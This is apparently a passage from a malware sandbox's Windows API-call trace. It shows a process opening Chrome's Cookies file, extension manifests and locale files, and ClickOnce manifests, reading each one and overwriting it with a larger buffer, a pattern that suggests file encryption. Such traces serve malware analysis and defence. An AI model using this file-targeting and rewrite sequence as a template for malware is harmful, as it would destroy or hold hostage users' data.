lpBuffer=0x28505c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28505c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0159.401] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0159.401] WriteFile (in: hFile=0x1dc, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0159.402] CloseHandle (hObject=0x1dc) returned 1 [0159.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.405] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.405] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2e30 [0159.406] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.406] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.406] ReleaseMutex (hMutex=0x168) returned 1 [0159.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0159.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", cchWideChar=68, lpMultiByteStr=0x1fac5ac, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpUsedDefaultChar=0x0) returned 68 [0159.406] ReadFile (in: hFile=0x1dc, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.409] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1e30 [0159.409] ReadFile (in: hFile=0x1dc, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.410] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1e30 [0159.410] WriteFile (in: hFile=0x1dc, lpBuffer=0x28505c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28505c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0159.411] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0159.411] WriteFile (in: hFile=0x1dc, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0159.412] CloseHandle (hObject=0x1dc) returned 1 [0159.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.413] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.413] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1c00 [0159.413] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.414] ReleaseMutex (hMutex=0x168) returned 1 [0159.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cookies", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0159.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cookies", cchWideChar=7, lpMultiByteStr=0x1f7ad44, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cookies", lpUsedDefaultChar=0x0) returned 7 [0159.414] ReadFile (in: hFile=0x1dc, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x331f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0159.417] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.418] WriteFile (in: hFile=0x1dc, lpBuffer=0x2850598*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2850598*, lpNumberOfBytesWritten=0x331f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0159.419] CloseHandle (hObject=0x1dc) returned 1 [0159.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.422] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.422] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x29 [0159.422] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.422] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.423] ReleaseMutex (hMutex=0x168) returned 1 [0159.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0159.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x1f735ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANIFEST-000001", lpUsedDefaultChar=0x0) returned 15 [0159.423] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fa55f0, nNumberOfBytesToRead=0x29, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa55f0*, lpNumberOfBytesRead=0x331f2bc*=0x29, lpOverlapped=0x0) returned 1 [0159.424] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.424] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5b1, lpOverlapped=0x0) returned 1 [0159.425] CloseHandle (hObject=0x1dc) returned 1 [0159.425] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.426] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.426] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2d5 [0159.426] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.426] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.427] ReleaseMutex (hMutex=0x168) returned 1 [0159.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0159.427] ReadFile (in: hFile=0x1dc, lpBuffer=0x286daa8, nNumberOfBytesToRead=0x2d5, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesRead=0x331f2bc*=0x2d5, lpOverlapped=0x0) returned 1 [0159.673] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.673] WriteFile (in: hFile=0x1dc, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x85d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x331f2d0*=0x85d, lpOverlapped=0x0) returned 1 [0159.674] CloseHandle (hObject=0x1dc) returned 1 [0159.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.675] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.675] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd6 [0159.675] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.675] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.675] ReleaseMutex (hMutex=0x168) returned 1 [0159.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.675] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4f58, nNumberOfBytesToRead=0xd6, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4f58*, lpNumberOfBytesRead=0x331f2bc*=0xd6, lpOverlapped=0x0) returned 1 [0159.677] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.677] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65e, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x65e, lpOverlapped=0x0) returned 1 [0159.677] CloseHandle (hObject=0x1dc) returned 1 [0159.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.678] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.678] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xe1 [0159.678] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.678] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.679] ReleaseMutex (hMutex=0x168) returned 1 [0159.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.679] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4f58, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4f58*, lpNumberOfBytesRead=0x331f2bc*=0xe1, lpOverlapped=0x0) returned 1 [0159.680] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.680] WriteFile (in: hFile=0x1dc, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x669, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x331f2d0*=0x669, lpOverlapped=0x0) returned 1 [0159.680] CloseHandle (hObject=0x1dc) returned 1 [0159.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.682] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.682] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xe9 [0159.682] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.682] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.682] ReleaseMutex (hMutex=0x168) returned 1 [0159.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.682] ReadFile (in: hFile=0x1dc, lpBuffer=0x2697308, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x331f2bc*=0xe9, lpOverlapped=0x0) returned 1 [0159.684] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.684] WriteFile (in: hFile=0x1dc, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x671, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x331f2d0*=0x671, lpOverlapped=0x0) returned 1 [0159.684] CloseHandle (hObject=0x1dc) returned 1 [0159.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.685] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.686] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x110 [0159.686] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.686] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.686] ReleaseMutex (hMutex=0x168) returned 1 [0159.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.686] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ef1ef8, nNumberOfBytesToRead=0x110, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1ef8*, lpNumberOfBytesRead=0x331f2bc*=0x110, lpOverlapped=0x0) returned 1 [0159.688] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.688] WriteFile (in: hFile=0x1dc, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x698, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x331f2d0*=0x698, lpOverlapped=0x0) returned 1 [0159.688] CloseHandle (hObject=0x1dc) returned 1 [0159.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.689] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.690] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xed [0159.690] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.690] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.690] ReleaseMutex (hMutex=0x168) returned 1 [0159.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.690] ReadFile (in: hFile=0x1dc, lpBuffer=0x2697308, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x331f2bc*=0xed, lpOverlapped=0x0) returned 1 [0159.692] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.692] WriteFile (in: hFile=0x1dc, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x331f2d0*=0x675, lpOverlapped=0x0) returned 1 [0159.693] CloseHandle (hObject=0x1dc) returned 1 [0159.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.694] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.694] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5b [0159.694] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.694] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.695] ReleaseMutex (hMutex=0x168) returned 1 [0159.695] 